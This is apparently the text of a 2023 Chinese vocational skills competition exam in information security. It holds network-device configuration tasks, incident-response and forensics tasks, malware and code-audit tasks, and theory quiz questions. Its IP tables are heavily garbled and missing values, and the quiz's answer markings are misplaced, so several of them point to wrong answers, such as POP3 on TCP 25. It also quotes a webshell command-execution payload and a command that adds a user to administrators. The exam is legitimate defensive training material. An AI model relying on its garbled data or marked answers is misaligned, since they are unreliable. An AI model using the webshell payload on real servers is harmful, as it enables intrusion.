GZ032 信息安全管理與評估賽項正式賽卷（附答案）完整版包括所有附件-2023年全國職業(yè)院校技能大賽賽項正式賽卷

全國職業(yè)院校技能大賽高等職業(yè)教育組信息安全管理與評估任務書模塊一網(wǎng)絡(luò)平臺搭建與設(shè)備安全防護一、比賽時間本階段比賽時長為180分鐘。二、賽項信息任務階競賽階段段競賽任務競賽時間分值第一階段網(wǎng)絡(luò)平臺搭建與設(shè)備安全防護任務1任務2網(wǎng)絡(luò)平臺搭建509:00-12:00網(wǎng)絡(luò)安全設(shè)備配置與防護250三、賽項內(nèi)容本次大賽，各位選手需要完成三個階段的任務，每個階段需要按裁判組專門提供的U盤中的“信息安全管理與評估競賽答題卡-模塊X”提交答案。選手首先需要在U盤的根目錄下建立一個名為“AGWxx”的文件夾（xx用具體的工位號替代），請將賽題第一階段所完成的“信息安全管理與評估競賽答題卡-模塊一”答題文檔，放置在“AGWxx”文件夾中。例如：08工位，則需要在U盤根目錄下建立“AGW08”文件夾，請將第一階段所完成的“信息安全管理與評估競賽答題卡-模塊一”答題文檔，放置在“AGW08”文件夾中?！咀⒁馐马棥恐辉试S在根目錄下的“AGWxx”文件夾中體現(xiàn)一次工位信息，不允許在其他文件夾名稱或文件名稱中再次體現(xiàn)工位信息，否則按作弊處理。1(一)2.IP地址規(guī)劃表設(shè)備名稱接口IP地址對端設(shè)備接口/30（trust1安全域）SWETH0/1-/30（untrust1安全域）ETH1/0/1-2SW/29（untrust）/24(DMZ)4/30（trust）54/32（trust）Router-idSWWAFAC防火墻FWETH0/3ETH0/4-5ETH1/0/21-22Loopback1SSLPoolETH1/0/4ETH1/0/5/26可用IP數(shù)量為20SSLVPN地址池ACETH1/0/4AC財務專線辦公專線/30三層交換機SWETH1/0/5VLAN21ETH1/0/1-2VLAN22ETH1/0/1-2VLAN23VlannameTO-FW1VlannameTO-FW2FW/30/292FWFWVlanname設(shè)備名稱接口ETH1/0/1-2IP地址對端設(shè)備接口TO-internetVLAN24ETH1/0/23-24VLAN25VlannameTO-BC/29BCVlannameTO-BC-NVlannameWIFI-vlan10VlannameWIFI-vlan20VlannameT0-CW7/30需設(shè)定BCETH1/0/18-19VLAN10VLAN20無線1無線2需設(shè)定VLAN30ETH1/0/4AC1/0/4/30VLAN31VlannameCWETH1/0/10-1210口開啟loopbackVLAN40ETH1/0/5VLAN41ETH1/0/6-9VLAN50ETH1/0/13-1413口開啟loopbackVLAN100ETH1/0/20/25AC1/0/5VlannameTO-IPV6VlannameBG/30/24PC3/24IPV62001:DA8:50::1/64VlannameSalesVlannameAP-Manage需設(shè)定Loopback1VLAN30ETH1/0/453/32(router-id)/30SW1/0/4VlannameTO-CWVLAN31VlannameCWETH1/0/6-96口開啟loopbackVLAN4029/250/30SW1/0/5VlannameTO-IPV6ETH1/0/5VLAN60無線控制器AC/24IPV62001:DA8:60::1/64VlannamesalesETH1/0/13-1413口開啟loopbackVLAN61ETH1/0/15-1815口開啟loopbackVLAN100VlannameBG/24FWETH1/0/4-5VlannameTO-FW3/30ETH1/0/21-22Loopback54/32(router-id)ETH1-2ETH38/30/2929/26（10個地址）SWSW日志服務器BCPPTP-poolWEB應用防火ETH2ETH3SERVERFW/243設(shè)備名稱接口IP地址對端設(shè)備接口墻WAFSW（20口）APETH1PC1SERVER網(wǎng)卡網(wǎng)卡ETH1/0/70/24SW(二)第一階段任務書任務1：網(wǎng)絡(luò)平臺搭建（50分）題號網(wǎng)絡(luò)需求根據(jù)網(wǎng)絡(luò)拓撲圖所示，按照IP地址參數(shù)表，對FW的名稱、各接口IP地址進行配置。設(shè)備名稱根據(jù)網(wǎng)絡(luò)拓撲圖所示配置。12345根據(jù)網(wǎng)絡(luò)拓撲圖所示，按照IP地址參數(shù)表，對SW的名稱進行配置，創(chuàng)建VLAN并將相應接口劃入VLAN。設(shè)備名稱根據(jù)網(wǎng)絡(luò)拓撲圖所示配置。根據(jù)網(wǎng)絡(luò)拓撲圖所示，按照IP地址參數(shù)表，對AC的各接口IP地址進行配置。設(shè)備名稱根據(jù)網(wǎng)絡(luò)拓撲圖所示配置。根據(jù)網(wǎng)絡(luò)拓撲圖所示，按照IP地址參數(shù)表，對BC的名稱、各接口IP地址進行配置。設(shè)備名稱根據(jù)網(wǎng)絡(luò)拓撲圖所示配置。根據(jù)網(wǎng)絡(luò)拓撲圖所示，按照IP地址規(guī)劃表，對WEB應用防火墻的名稱、各接口IP地址進行配置。設(shè)備名稱根據(jù)網(wǎng)絡(luò)拓撲圖所示配置。任務2：網(wǎng)絡(luò)安全設(shè)備配置與防護（250分）1.SW和AC開啟telnet登錄功能，telnet登錄賬戶僅包含“ABC4321”，密碼為明文“ABC4321”，采用telnet方式登錄設(shè)備時需要輸入enable密碼，密碼設(shè)置為明文“12345”。2.北京總公司和南京分公司租用了運營商兩條裸光纖，實現(xiàn)內(nèi)部辦公互通。一條裸光纖承載公司財務部門業(yè)務，一條裸光纖承載其他內(nèi)部業(yè)務。使用相關(guān)技術(shù)實現(xiàn)總公司財務段路由表與公司其它業(yè)務網(wǎng)段路由表隔離，財務業(yè)務位于VPN實例名稱CW內(nèi)，總公司財務和分公司財務能夠通信，財務部門總公司和分公司之間采用RIP路由實現(xiàn)互相訪問。3.盡可能加大總公司核心和出口BC之間的帶寬。44.為防止終端產(chǎn)生MAC地址泛洪攻擊，請配置端口安全，已劃分VLAN41的端口最多學習到5個MAC地址，發(fā)生違規(guī)阻止后續(xù)違規(guī)流量通過，不影響已有流量并產(chǎn)生LOG日志；連接PC1的接口為專用接口，限定只允許PC1的MAC地址可以連接。5.總公司核心交換機端口ETH1/0/6上，將屬于網(wǎng)段內(nèi)的報文帶寬限制為10Mbps，突發(fā)值設(shè)為4M字節(jié)，超過帶寬的該網(wǎng)段內(nèi)的報文一律丟棄。6.在SW上配置辦公用戶在上班時間（周一到周五9:00-17:00）禁止訪問外網(wǎng)，內(nèi)部網(wǎng)絡(luò)正常訪問。7.總公司SW交換機模擬因特網(wǎng)交換機，通過某種技術(shù)實現(xiàn)本地路由和因特網(wǎng)路由進行隔離，因特網(wǎng)路由實例名internet。8.對SW上VLAN50開啟以下安全機制。業(yè)務內(nèi)部終端相互二層隔離；14口啟用環(huán)路檢測，環(huán)路檢測的時間間隔為10s，發(fā)現(xiàn)環(huán)路以后關(guān)閉該端口，恢復時間為30分鐘，如私設(shè)DHCP服務器關(guān)閉該端口，同時開啟防止ARP網(wǎng)關(guān)欺騙攻擊。9.配置使北京公司內(nèi)網(wǎng)用戶通過總公司出口BC訪問因特網(wǎng)，分公司內(nèi)網(wǎng)用戶通過分公司出口FW訪問因特網(wǎng)，要求總公司核心交換機9口VLAN41業(yè)務的用戶訪問因特網(wǎng)的流量往反數(shù)據(jù)流經(jīng)過防火墻在通過BC訪問因特網(wǎng)；防火墻untrust1和trust1開啟安全防護，參數(shù)采用默認參數(shù)。10.為了防止DOS攻擊的發(fā)生，在總部交換機VLAN50接口下對MAC、ARP、ND表項數(shù)量進行限制，具體要求為：最大可以學習20個動態(tài)MAC地址、20個動態(tài)ARP地址、50個NEIGHBOR表項。11.總公司和分公司今年進行IPv6試點，要求總公司和分公司銷售部門用戶能夠通過IPv6相互訪問，IPv6業(yè)務通過租用裸纖承載。實現(xiàn)分公司和總公司5IPv6業(yè)務相互訪問；AC與SW之間配置靜態(tài)路由使VLAN50與VLAN60可以通過IPv6通信；VLAN40開啟IPv6，IPv6業(yè)務地址規(guī)劃如下：業(yè)務IPv6地址總公司VLAN50分公司VLAN602001:DA8:50::1/642001:DA8:60::1/6412.在總公核心司交換機SW配置IPv6地址，開啟路由公告功能，路由器公告的生存期為2小時，確保銷售部門的IPv6終端可以通過DHCPSERVER獲取IPv6地址，在SW上開啟IPv6DHCPserver功能，IPv6地址范圍2001:da8:50::2-2001:da8:50::100。13.在南京分公司上配置IPv6地址，使用相關(guān)特性實現(xiàn)銷售部的IPv6終端可自動從網(wǎng)關(guān)處獲得IPv6無狀態(tài)地址。14.SW與AC，AC與FW之間配置OSPFarea0開啟基于鏈路的MD5認證，密鑰自定義，傳播訪問Internet默認路由，讓總公司和分公司內(nèi)網(wǎng)用戶能夠相互訪問包含AC上loopback1地址；總公司SW和BC之間運行靜態(tài)路由協(xié)議。15.分公司銷售部門通過防火墻上的DHCPSERVER獲取IP地址，serverIP地址為54，地址池范圍0-00，dns-server。16.如果SW的11端口的收包速率超過30000則關(guān)閉此端口，恢復時間5分鐘，為了更好地提高數(shù)據(jù)轉(zhuǎn)發(fā)的性能，SW交換中的數(shù)據(jù)包大小指定為1600字節(jié)。17.為實現(xiàn)對防火墻的安全管理，在防火墻FW的Trust安全域開啟PING，HTTP，telnet，SNMP功能，Untrust安全域開啟SSH、HTTPS功能。SNMP服務器地址：00，團體字：skills。618.在分部防火墻上配置，分部VLAN業(yè)務用戶通過防火墻訪問Internet時，復用公網(wǎng)IP:、；保證每一個源IP產(chǎn)生的所有會話將被映射到同一個固定的IP地址，當有流量匹配本地址轉(zhuǎn)換規(guī)則時產(chǎn)生日志信息，將匹配的日志發(fā)送至0的UDP2000端口。19.遠程移動辦公用戶通過專線方式接入分公司網(wǎng)絡(luò)，在防火墻FW上配置，采用SSL方式實現(xiàn)僅允許對內(nèi)網(wǎng)VLAN61的訪問，端口號使用4455，用戶名密碼均為ABC4321，地址池參見地址表。20.分公司部署了一臺Web服務器IP為0，接在防火墻的DMZ區(qū)域為外網(wǎng)用戶提供Web服務，要求內(nèi)網(wǎng)用戶能ping通Web服務器和訪問服務器上的Web服務（端口80）和遠程管理服務器（端口3389），外網(wǎng)用戶只能通過防火墻外網(wǎng)地址訪問服務器Web服務。21.為了安全考慮，無線用戶移動性較強，訪問因特網(wǎng)時需要在BC上開啟Web認證，采用本地認證，密碼賬號都為web4321。22.由于分公司到因特網(wǎng)鏈路帶寬比較低，出口只有200Mbps帶寬，需要在防火墻配置iQoS，系統(tǒng)中P2P總的流量不能超過100Mbps，同時限制每用戶最大下載帶寬為2Mbps，上傳為1Mbps，優(yōu)先保障HTTP應用，為HTTP預留100Mbps帶寬。23.為凈化上網(wǎng)環(huán)境，要求在防火墻FW做相關(guān)配置，禁止無線用戶周一至周五工作時間9:00-18:00的郵件內(nèi)容中含有“病毒”“賭博”的內(nèi)容，且記錄日志。24.由于總公司無線是通過分公司的無線控制器統(tǒng)一管理，為了防止專線故障導致無線不能使用，總公司和分公司使用互聯(lián)網(wǎng)作為總公司無線AP和AC相互訪問的備份鏈路。FW和BC之間通過IPSec技術(shù)實現(xiàn)AP管理段與無線AC之間聯(lián)通，具體要求為采用預共享密碼為ABC4321，IKE階段17采用DH組1、3DES和MD5加密方式，IKE階段2采用ESP-3DES，MD5。25.總公司用戶，通過BC訪問因特網(wǎng)，BC采用路由方式，在BC上做相關(guān)配置，讓總公司內(nèi)網(wǎng)用戶（不包含財務）通過BC外網(wǎng)口IP訪問因特網(wǎng)。26.在BC上配置PPTPVPN讓外網(wǎng)用戶能夠通過PPTPVPN訪問總公司SW上內(nèi)網(wǎng)地址，用戶名為test，密碼test23。27.為了提高分公司出口帶寬，盡可能加大分公司AC和出口FW之間帶寬。28.在BC上配置url過濾策略，禁止總公司內(nèi)網(wǎng)用戶在周一到周五的早上8點到晚上18點訪問外網(wǎng)。29.在BC上開啟IPS策略，對總公司內(nèi)網(wǎng)用戶訪問外網(wǎng)數(shù)據(jù)進行IPS防護，保護服務器、客戶端和惡意軟件檢測，檢測到攻擊后進行拒絕并記錄日志。30.總公司出口帶寬較低，總帶寬只有200Mbps，為了防止內(nèi)網(wǎng)用戶使用P2P迅雷下載占用大量帶寬需要限制內(nèi)部員工使用P2P工具下載的流量，最大上下行帶寬都為50Mbps，以免P2P流量占用太多的出口網(wǎng)絡(luò)帶寬，啟用阻斷記錄。31.通過BC設(shè)置總公司用戶在上班時間周一到周五9:00到18:00禁止玩游戲,并啟用阻斷記錄。32.限制總公司內(nèi)網(wǎng)用戶訪問因特網(wǎng)Web視頻和即時通信下行最大帶寬為20Mbps，上傳為10Mbps，啟用阻斷記錄。33.BC上開啟黑名單告警功能，級別為預警狀態(tài)，并進行郵件告警和記錄日志，發(fā)現(xiàn)CPU使用率大于80%，內(nèi)存使用大于80%時進行郵件告警并記錄日志，級別為嚴重狀態(tài)。發(fā)送郵件地址為123@163.com，接收郵件為133139123456@163.com。834.分公司內(nèi)部有一臺網(wǎng)站服務器直連到WAF，地址是0，端口是8080，配置將服務訪問日志、DDOS日志、攻擊日志信息發(fā)送syslog日志服務器，IP地址是，UDP的514端口。35.在分公司的WAF上配置，對會話安全進行防護，開啟Cookie加固和加密。36.編輯防護策略，規(guī)則名稱為“HTTP協(xié)議”，定義HTTP請求最大長度為1024，防止緩沖區(qū)溢出攻擊。37.為防止暴力破解網(wǎng)站服務器，在WAF上配置對應的防護策略進行限速防護，名稱為“防暴力破解”，限速頻率為每秒1次，嚴重級別為高級，記錄日志；38.WAF上配置阻止用戶上傳ZIP、DOC、JPG、RAR格式文件，規(guī)則名稱為“阻止文件上傳”。39.WAF上配置對應防護規(guī)則，規(guī)則名稱為“HTTP特征防護”，要求對SQL注入、跨站腳本攻擊XSS、信息泄露、防爬蟲、惡意攻擊等進行防護，一經(jīng)發(fā)現(xiàn)立即阻斷并發(fā)送郵件報警及記錄日志。40.WAF上配置對“”，開啟弱密碼檢測，名稱配置為“弱密碼檢測”。41.WAF上配置防跨站防護功能，規(guī)則名稱為“防跨站防護”保護“”不受攻擊，處理動作設(shè)置為阻斷，請求方法為GET、POST方式。42.由于公司IP地址為統(tǒng)一規(guī)劃，原有無線網(wǎng)段IP地址為/22,為了避免地址浪費需要對IP地址進行重新分配；要求如下：未來公司預計部署AP50臺；辦公無線用戶VLAN10預計300人，來賓用戶VLAN20預計不超過30人。943.AC上配置DHCP，管理VLAN為VLAN100，為AP下發(fā)管理地址，網(wǎng)段中第一個可用地址為AP管理地址，最后一個可用地址為網(wǎng)關(guān)地址，AP通過DHCPopion43注冊，AC地址為loopback1地址；為無線用戶VLAN10、20下發(fā)IP地址，最后一個可用地址為網(wǎng)關(guān)。44.在NETWORK下配置SSID，需求如下：NETWORK1下設(shè)置SSIDABC4321，VLAN10，加密模式為wpa-personal,其口令為43214321。45.NETWORK2下設(shè)置SSIDGUEST，VLAN20不進行認證加密,做相應配置隱藏該SSID。46.NETWORK2開啟內(nèi)置portal+本地認證的認證方式，賬號為test密碼為test4321。47.配置SSIDGUEST每天早上0點到6點禁止終端接入;GUSET最多接入10個用戶，并對GUEST網(wǎng)絡(luò)進行流控，上行1Mbps，下行2Mbps；配置所有無線接入用戶相互隔離。48.配置當AP上線，如果AC中儲存的Image版本和AP的Image版本號不同時，會觸發(fā)AP自動升級；配置AP發(fā)送向無線終端表明AP存在的幀時間間隔為2秒；配置AP失敗狀態(tài)超時時間及探測到的客戶端狀態(tài)超時時間都為2小時。49.為了提高wifi用戶體驗感，拒絕弱信號終端接入，設(shè)置閾值低于50的終端接入無線信號；為防止非法AP假冒合法SSID，開啟AP威脅檢測功能。50.通過配置防止多AP和AC相連時過多的安全認證連接而消耗CPU資源，檢測到AP與AC在10分鐘內(nèi)建立連接5次就不再允許繼續(xù)連接，兩小時后恢復正常。10全國職業(yè)院校技能大賽高等職業(yè)教育組信息安全管理與評估任務書模塊二網(wǎng)絡(luò)安全事件響應、數(shù)字取證調(diào)查、應用程序安全1、比賽時間及注意事項本階段比賽時長為180分鐘，時間為13:30-16:30?！咀⒁馐马棥浚?）比賽結(jié)束，不得關(guān)機；（2）選手首先需要在U盤的根目錄下建立一個名為“AGWxx”的文件夾（xx用具體的工位號替代），請將賽題第二階段所完成的“信息安全管理與評估競賽答題卡-模塊二”答題文檔，放置在“AGWxx”文件夾中。例如：08工位，則需要在U盤根目錄下建立“AGW08”文件夾，請將第二階段所完成的“信息安全管理與評估競賽答題卡-模塊二”答題文檔，放置在“AGW08”文件夾中。（3）請不要修改實體機的配置和虛擬機本身的硬件參數(shù)。2、所需軟硬件設(shè)備和材料所有測試項目都可由參賽選手根據(jù)基礎(chǔ)設(shè)施列表中指定的設(shè)備和軟件完成。3、評分方案本階段總分數(shù)為300分。4、項目和任務描述隨著網(wǎng)絡(luò)和信息化水平的不斷發(fā)展，網(wǎng)絡(luò)安全事件也層出不窮，網(wǎng)絡(luò)惡意代碼傳播、信息竊取、信息篡改、遠程控制等各種網(wǎng)絡(luò)攻擊行為已嚴重威脅到信息系統(tǒng)的機密性、完整性和可用性。因此，對抗網(wǎng)絡(luò)攻擊，組織安全事件應急響應，采集電子證據(jù)等技術(shù)工作是網(wǎng)絡(luò)安全防護的重要部分。現(xiàn)在，A集團已遭受來自不明組織的非法惡意攻擊，您的團隊需要幫助A集團追蹤此網(wǎng)絡(luò)攻擊來源，分析惡意攻擊攻擊行為的證據(jù)線索，找出操作系統(tǒng)和應用程序中的漏洞或者惡意代碼，幫助其鞏固網(wǎng)絡(luò)安全防線。1本模塊主要分為以下三個部分：網(wǎng)絡(luò)安全事件響應數(shù)字取證調(diào)查應用程序安全5、工作任務第一部分網(wǎng)絡(luò)安全事件響應任務1：CentOS服務器應急響應（70分）A集團的應用服務器被黑客入侵，該服務器的Web應用系統(tǒng)被上傳惡意軟件，系統(tǒng)文件被惡意軟件破壞，您的團隊需要幫助該公司追蹤此網(wǎng)絡(luò)攻擊的來源，在服務器上進行全面的檢查，包括日志信息、進程信息、系統(tǒng)文件、惡意文件等，從而分析黑客的攻擊行為，發(fā)現(xiàn)系統(tǒng)中的漏洞，并對發(fā)現(xiàn)的漏洞進行修復。本任務素材清單：CentOS服務器虛擬機。受攻擊的Server服務器已整體打包成虛擬機文件保存，請自行導入分析。用戶名：root密碼：nanyidian..請按要求完成該部分的工作任務。任務1：CentOS服務器應急響應序號任務內(nèi)容答案請?zhí)峤痪W(wǎng)站管理員的用戶名和密碼12攻擊者通過應用后臺修改了某文件獲取了服務器權(quán)限，請?zhí)峤辉撐募奈募粽咄ㄟ^篡改文件后，可通過該網(wǎng)站官網(wǎng)進行任意未授權(quán)命令執(zhí)行，請?zhí)峤焕迷撃抉R執(zhí)行phpinfo的payload,例如:3/shell.php?cmd=phpinfo();攻擊者進一步留下的免殺的webshell在網(wǎng)站中，請?zhí)峤辉搒hell的原文最簡式，例如：<?php...?>45攻擊者修改了某文件，導致webshell刪除后會自動2生成，請?zhí)峤辉撐募慕^對路徑請?zhí)峤痪W(wǎng)站服務連接數(shù)據(jù)庫使用的數(shù)據(jù)庫賬號和密碼67請?zhí)峤还粽咴跀?shù)據(jù)庫中留下的信息，格式為：flag{...}第二部分數(shù)字取證調(diào)查任務2：基于Windows的內(nèi)存取證（40分）A集團某服務器系統(tǒng)感染惡意程序，導致系統(tǒng)關(guān)鍵文件被破壞，請分析A集團提供的系統(tǒng)鏡像和內(nèi)存鏡像，找到系統(tǒng)鏡像中的惡意軟件，分析惡意軟件行為。本任務素材清單：內(nèi)存鏡像（*.raw）。任務2：基于Windows的內(nèi)存取證序號任務內(nèi)容答案請指出內(nèi)存中疑似惡意進程12請指出該員工使用的公司OA平臺的密碼黑客傳入一個木馬文件并做了權(quán)限維持，請問木馬文件名是什么34請?zhí)峤辉撚嬎銠C中記錄的重要聯(lián)系人的家庭住址請按要求完成該部分的工作任務。任務3：通信數(shù)據(jù)分析取證（50分）A集團的網(wǎng)絡(luò)安全監(jiān)控系統(tǒng)發(fā)現(xiàn)惡意份子正在實施高級可持續(xù)攻擊（APT），并抓取了部分可疑流量包。請您根據(jù)捕捉到的流量包，搜尋出網(wǎng)絡(luò)攻擊線索，分解出隱藏的惡意程序，并分析惡意程序的行為。本任務素材清單：捕獲的通信數(shù)據(jù)文件。請按要求完成該部分的工作任務。任務3：通信數(shù)據(jù)分析取證序號任務內(nèi)容答案3請?zhí)峤痪W(wǎng)絡(luò)數(shù)據(jù)包中傳輸?shù)目蓤?zhí)行的惡意程序文件名1請?zhí)峤辉搻阂獬绦蛳螺d載荷的IP和端口請?zhí)峤粣阂獬绦蜉d荷讀取的本地文件名（含路徑）請?zhí)峤粣阂獬绦蜃x取的本地文件的內(nèi)容234任務4：基于Linux計算機單機取證（60分）對給定取證鏡像文件進行分析，搜尋證據(jù)關(guān)鍵字（線索關(guān)鍵字為“evidence1”、“evidence2”、……、“evidence10”，有文本形式也有圖片形式，不區(qū)分大小寫），請?zhí)崛『凸潭ū荣愐蟮臉说淖C據(jù)文件，并按樣例的格式要求填寫相關(guān)信息，證據(jù)文件在總文件數(shù)中所占比例不低于15%。取證的信息可能隱藏在正常的、已刪除的或受損的文件中，您可能需要運用編碼轉(zhuǎn)換技術(shù)、加解密技術(shù)、隱寫技術(shù)、數(shù)據(jù)恢復技術(shù)，還需要熟悉常用的文件格式（如辦公文檔、壓縮文檔、圖片等）。本任務素材清單：取證鏡像文件。請按要求完成該部分的工作任務。任務4：基于Linux計算機單機取證證據(jù)編號在取證鏡像中的文件名鏡像中原文件Hash碼（MD5，不區(qū)分大小寫）evidence1evidence2evidence3evidence4evidence5evidence6evidence7evidence84evidence9evidence10第三部分應用程序安全任務5：Android惡意程序分析（50分）A集團發(fā)現(xiàn)其發(fā)布的Android移動應用程序文件遭到非法篡改，您的團隊需要協(xié)助A集團對該惡意程序樣本進行逆向分析、對其攻擊/破壞的行為進行調(diào)查取證。本任務素材清單：Android移動應用程序文件。請按要求完成該部分的工作任務。任務5：Android惡意程序分析序號任務內(nèi)容答案提交素材中的惡意應用回傳數(shù)據(jù)的url地址提交素材中的惡意代碼保存數(shù)據(jù)文件名稱（含路徑）提交素材中的惡意行為發(fā)起的dex的SHA1簽名值描述素材中惡意代碼的行為1234任務6：C代碼審計（30分）代碼審計是指對源代碼進行檢查，尋找代碼存在的脆弱性，這是一項需要多方面技能的技術(shù)。作為一項軟件安全檢查工作，代碼安全審查是非常重要的一部分，因為大部分代碼從語法和語義上來說是正確的，但存在著可能被利用的安全漏洞，你必須依賴你的知識和經(jīng)驗來完成這項工作。本任務素材清單：C源代碼文件。請按要求完成該部分的工作任務。任務6：C代碼審計序號任務內(nèi)容答案請指出本段代碼存在什么漏洞15請指出存在漏洞的函數(shù)名稱，例如：scanf26理論技能與職業(yè)素養(yǎng)（100分）2023年全國職業(yè)院校技能大賽（高等職業(yè)教育組）“信息安全管理與評估”理論技能【注意事項】1.理論測試前請仔細閱讀測試系統(tǒng)使用說明文檔，按提供的賬號和密碼登錄測試系統(tǒng)進行測試，賬號只限1人登錄。2.該部分答題時長包含在第三階段比賽時長內(nèi)，請在臨近競賽結(jié)束前提交。3.參賽團隊可根據(jù)自身情況，可選擇1-3名參賽選手進行作答，團隊內(nèi)部可以交流，但不得影響其他參賽隊。一、單選題（每題2分，共35題，共70分）1、應急事件響應和恢復措施的目標是（A、保證信息安全）。B、最小化事件的影響C、找出事件的責任人D、加強組織內(nèi)部的監(jiān)管2、下列數(shù)據(jù)類型不屬于靜態(tài)數(shù)據(jù)提取的數(shù)據(jù)類型（）。A、系統(tǒng)日志B、系統(tǒng)進程C、網(wǎng)絡(luò)數(shù)據(jù)包D、文件元數(shù)據(jù)3、安全評估的方法不包括（A、風險評估）。B、威脅建模C、減少掃描D、滲透測試4、以下不屬于入侵監(jiān)測系統(tǒng)的是（A、AAFID系統(tǒng)）。B、SNORT系統(tǒng)C、IETF系統(tǒng)D、NETEYE系統(tǒng)5、通過TCP序號猜測，攻擊者可以實施下列哪一種攻擊？（A、端口掃描攻擊）B、ARP欺騙攻擊C、網(wǎng)絡(luò)監(jiān)聽攻擊D、TCP會話劫持攻擊6、下面不是數(shù)據(jù)庫的基本安全機制的是（A、用戶認證）。B、用戶授權(quán)C、審計功能D、電磁屏蔽7、假設(shè)創(chuàng)建了名為f的實例，如何在f中調(diào)用類的add_food函數(shù)？（）A、f(add_food())B、f.[add_food()]C、f.add_foodD、f.add_food()8、aspx的網(wǎng)站配置文件一般存放在哪個文件里？（）A、conn.aspB、config.phpC、web.configD、index.aspx9、一個基于特征的IDS應用程序需要下列選項中的哪一項來對一個攻擊做出反應？（）A、正確配置的DNSB、正確配置的規(guī)則C、特征庫D、日志10、完成數(shù)據(jù)庫應用系統(tǒng)的設(shè)計并進行實施后，數(shù)據(jù)庫系統(tǒng)進入運行維護階段。下列工作中不屬于數(shù)據(jù)庫運行維護工作的是（A、恢復數(shù)據(jù)庫數(shù)據(jù)以核查問題）。B、為了保證安全，定期修改數(shù)據(jù)庫用戶的密碼C、更換數(shù)據(jù)庫服務器以提高應用系統(tǒng)運行速度D、使用開發(fā)人員提供的SQL語句易始化數(shù)據(jù)庫中的表11、以下不屬入侵檢測中要收集的信息的是（A、系統(tǒng)和網(wǎng)絡(luò)日志文件）。B、目錄和文件的內(nèi)容C、程序執(zhí)行中不期望的行為D、物理形式的入侵信息12、POP3服務器使用的監(jiān)聽端口是？（A、TCP的25端口）B、TCP的110端口C、UDP的25端口D、UDP的110端口13、目標計算機與網(wǎng)關(guān)通信失敗，更會導致通信重定向的攻擊形式是？（）A、病毒B、木馬C、DOSD、ARP欺騙14、________的目的是發(fā)現(xiàn)目標系統(tǒng)中存在的安全隱患，分析所使用的安全機制是否能夠保證系統(tǒng)的機密性、完整性和可用性。（）A、漏洞分析B、入侵檢測C、安全評估D、端口掃描15、以下哪一項描述不正確？（A、ARP是地址解析協(xié)議）B、TCP/IP傳輸層協(xié)議有TCP和UDPC、UDP協(xié)議提供的是可靠傳輸D、IP協(xié)議位于TCP/IP網(wǎng)際層16、如果想在類中創(chuàng)建私有方法，下面哪個命名是正確的？（）A、_add_oneB、add_oneC、__add_oneD、add_one__17、MD5的主循環(huán)有（）輪。A、3B、4C、5D、818、根據(jù)網(wǎng)絡(luò)安全應急處理流程，應急啟動后，應該進行哪一步（）。A、歸類&定級B、應急處置C、信息通報D、后期處理19、()是一種架構(gòu)在公用通信基礎(chǔ)設(shè)施上的專用數(shù)據(jù)通信網(wǎng)絡(luò)，利用IPSec等網(wǎng)絡(luò)層安全協(xié)議和建立在PKI上的加密與簽名技術(shù)來獲得私有性。（）A、SETB、DDNC、VPND、PKIX20、假設(shè)系統(tǒng)中有n個用戶，他們使用對稱加密體制實現(xiàn)保密通信，那么系統(tǒng)中共需要管理（n(n-1)/2）個密鑰，每個用戶需要保存（）個密鑰。A、n-1B、2nC、Cn2D、n！21、什么是數(shù)據(jù)庫安全的第一道保障（）。（A、操作系統(tǒng)的安全）B、數(shù)據(jù)庫管理系統(tǒng)層次C、網(wǎng)絡(luò)系統(tǒng)的安全D、數(shù)據(jù)庫管理員22、下列方法中不能用來進行DNS欺騙的是？（A、緩存感染）B、DNS信息劫持C、DNS重定向D、路由重定向23、下列選項哪列不屬于網(wǎng)絡(luò)安全機制？（A、加密機制）B、數(shù)據(jù)簽名機制C、解密機制D、認證機制24、部署大中型IPSECVPN時，從安全性和維護成本考慮，建議采取什么樣的技術(shù)手段提供設(shè)備間的身份驗證。（A、預共享密鑰）B、數(shù)字證書C、路由協(xié)議驗證D、802.1x25、現(xiàn)今非常流行的SQL（數(shù)據(jù)庫語言）注入攻擊屬于下列哪一項漏洞的利用？（）A、域名服務的欺騙漏洞B、郵件服務器的編程漏洞C、WWW服務的編程漏洞D、FTP服務的編程漏洞26、維吉利亞(Vigenere)密碼是古典密碼體制比較有代表性的一種密碼，其密碼體制采用的是（A、置換密碼）。B、單表代換密碼C、多表代換密碼D、序列密碼27、如果VPN網(wǎng)絡(luò)需要運行動態(tài)路由協(xié)議并提供私網(wǎng)數(shù)據(jù)加密,通常采用什么技術(shù)手段實現(xiàn)（）。A、GREB、GRE+IPSECC、L2TPD、L2TP+IPSEC28、過濾所依據(jù)的信息來源不包括？（A、IP包頭）B、TCP包頭C、UDP包頭D、IGMP包頭29、bind9的日志默認保存在？（A、/var/log/named.log）B、/var/log/named/named.logC、/var/named/data/named.runD、/var/log/data/named.run30、一個完整的密碼體制，不包括以下（A、明文空間）要素。B、密文空間C、數(shù)字簽名D、密鑰空間31、Linux系統(tǒng)中，添加用戶的命令是？（A、netusertest/add）B、useraddtestC、useraddtestD、testuseradd32、以下關(guān)于正則表達式，說法錯誤的是？（A、‘root’表示匹配包含root字符串的內(nèi)容B、‘.’表示匹配任意字符）C、[0-9]表示匹配數(shù)字D、‘^root’表示取反33、將用戶user123修改為管理員權(quán)限命令是（A、netuserlocalgroupadministratorsuser123/addB、netuselocalgroupadministratorsuser123/addC、netlocalgroupadministratorsuser123/addD、netlocalgroupadministratoruser123/add）。34、VIM模式切換的說法中，正確的是？（A、命令模式通過i命令進入輸入模式B、輸入模式通過:切換到末行模式C、命令模式通過ESC鍵進入末行模式D、末行模式通過i進入輸入模式）35、在常見的安全掃描工具中，以下（）主要用來分析Web站點的漏洞，可以針對數(shù)千種常見的網(wǎng)頁漏洞或安全風險進行檢測。A、SuperScanB、Fluxay（流光）C、WiktoD、MBSA二、多選題（每題3分，共10題，共30分）1、在動態(tài)易失數(shù)據(jù)提取及固定過程中，為了提高數(shù)據(jù)準確性，以下()技術(shù)不對數(shù)據(jù)傳輸造成影響A、數(shù)據(jù)庫觸發(fā)器B、數(shù)據(jù)加密技術(shù)C、數(shù)據(jù)壓縮校驗D、網(wǎng)絡(luò)延遲2、在應急響應流程中，以下()方法適合收集信息。A、監(jiān)控系統(tǒng)B、系統(tǒng)日志分析C、詢問用戶D、隨機抽樣調(diào)查E、發(fā)布公告3、關(guān)于函數(shù)中變量的定義，哪些說法是正確的？（）A、即使函數(shù)外已經(jīng)定義了這個變量，函數(shù)內(nèi)部仍然可以定義B、如果一個函數(shù)已經(jīng)定義了name變量，那么其他的函數(shù)就不能再定義C、函數(shù)可以直接引用函數(shù)外部定義過的變量D、函數(shù)內(nèi)部只能定義一個變量4、下面標準可用于評估數(shù)據(jù)庫的安全